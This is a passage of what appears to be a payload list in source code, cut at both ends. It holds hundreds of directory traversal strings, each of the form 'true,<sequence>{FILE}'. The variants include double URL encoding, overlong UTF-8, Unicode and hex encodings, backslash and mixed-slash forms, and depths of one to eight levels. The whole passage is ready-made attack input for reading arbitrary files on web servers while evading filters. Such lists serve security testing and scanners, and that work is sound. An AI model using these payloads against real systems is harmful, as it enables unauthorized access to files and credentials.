"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%5c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,\\../{FILE}", + "true,\\../\\../{FILE}", + "true,\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,/..\\{FILE}", + "true,/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,.../{FILE}", + "true,.../.../{FILE}", + "true,.../.../.../{FILE}", + "true,.../.../.../.../{FILE}", + "true,.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../.../{FILE}", + "true,...\\{FILE}", + "true,...\\...\\{FILE}", + "true,...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,..../{FILE}", + "true,..../..../{FILE}", + "true,..../..../..../{FILE}", + "true,..../..../..../..../{FILE}", + "true,..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../..../{FILE}", + "true,....\\{FILE}", + "true,....\\....\\{FILE}", + "true,....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,........................................................................../{FILE}", + "true,........................................................................../../{FILE}", + "true,........................................................................../../../{FILE}", + "true,........................................................................../../../../{FILE}", + "true,........................................................................../../../../../{FILE}", + "true,........................................................................../../../../../../{FILE}", + "true,........................................................................../../../../../../../{FILE}", + "true,........................................................................../../../../../../../../{FILE}", + "true,..........................................................................\\{FILE}", + "true,..........................................................................\\..\\{FILE}", + "true,..........................................................................\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%u2215{FILE}", + "true,..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,..%u2216{FILE}", + "true,..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uF025{FILE}", + "true,..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,..0x2f{FILE}", + "true,..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,..0x5c{FILE}", + "true,..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,///%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,\\\\\\%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..\\\\{FILE}", + "true,..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,./\\/./{FILE}", + "true,./\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/./{FILE}", + 